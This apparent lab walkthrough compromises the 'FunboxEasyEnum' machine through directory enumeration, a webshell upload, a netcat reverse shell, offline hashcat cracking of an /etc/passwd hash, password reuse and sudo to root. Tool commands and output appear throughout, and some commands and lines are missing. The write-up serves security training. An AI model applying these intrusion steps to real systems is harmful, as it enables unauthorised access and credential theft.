Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.
We now move on to enumerating with dirsearch.py, first running the seclists big.txt wordlist against the target.
We view robots.txt and find it contains:
Running dirsearch.py against this path found nothing further. Viewing
/phpmyadmin and attempting to login with default credentials shows we are unable to proceed with the default root account.
Running dirsearch.py again on the target this time using the
--suffix parameter to append .php to all entries we find
┌──(kali㉿puckie)-[~/offsec/funboxeasyenum]
└─$ python3 /usr/share/dirsearch/dirsearch.py -u http://192.168.109.132/ -w /usr/share/dirb/wordlists/big.txt --full-url -t 75 --suffix=.php

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | Suffixes: .php | HTTP method: GET | Threads: 75 | Wordlist size: 20468

Output File: /home/kali/.dirsearch/reports/192.168.109.132/_21-08-27_08-32-48.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-08-27_08-32-48.log

Target: http://192.168.109.132/

[08:32:48] Starting:
[08:32:49] 403 -  280B - http://192.168.109.132/.htpasswd.php
[08:32:53] 403 -  280B - http://192.168.109.132/.htaccess.php
[08:33:32] 200 -    4KB - http://192.168.109.132/mini.php

Task Completed
/mini.php we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php
Knowing that the above files exist in the web root, I then browsed to /webshell.php and was able to execute commands, confirming we are running as www-data.
Running the command
which nc shows we have
netcat installed on the target machine. I set up a
netcat listener on my attacking machine, then ran the following command through the webshell:
Resulting in a reverse shell.
Upgrade the shell:
Checking /etc/passwd shows the user ‘oracle’ has a password hash stored directly in the file rather than in /etc/shadow. Because /etc/passwd is world-readable, any local user (including www-data) can read the hash and crack it offline.
oracle:$1$|O@GOeN$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
I then took the hash and ran it under mode 500 (md5crypt, the $1$ format) in
Hashcat on my Windows host, which cracked the password as: hiphop
PS E:\PENTEST\hashcat-4.2.1> .\hashcat32.exe -m500 .\linuxhash.TXT E:\PENTEST\thc-hydra\rockyou.txt --force
hashcat (v4.2.1) starting...

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: E:\PENTEST\thc-hydra\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 9 secs

$1$|O@GOeN$PGb9VNu29e9s6dMNJKH/R0:hiphop

Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$|O@GOeN$PGb9VNu29e9s6dMNJKH/R0
I then used
su to switch to the user ‘oracle’ and was successful switching.
After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.
I disconnected the shell and re-ran the initial reverse shell command through the web shell to reconnect as www-data. Moving into
/etc/phpmyadmin and reading the config-db.php file, we see credential information.
We find the credentials
phpmyadmin:tgbzhnujm! I then logged into MySQL and was unable to identify anything interesting in the contained databases.
From here I started trying the recovered passwords against the users in the
/home/ directory until I got a match on the user ‘karla’ with the phpmyadmin password.
Knowing this worked, I exited the shell and logged into
SSH with the same credentials just so we have all the advantages of a
$ su karla
su: must be run from a terminal
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@funbox7:/$ su karla
su karla
Password: tgbzhnujm!

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

karla@funbox7:/$ sudo -l
sudo -l
[sudo] password for karla: tgbzhnujm!
Matching Defaults entries for karla on funbox7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karla may run the following commands on funbox7:
    (ALL : ALL) ALL
karla@funbox7:/$ sudo /bin/bash -p
sudo /bin/bash -p
root@funbox7:/#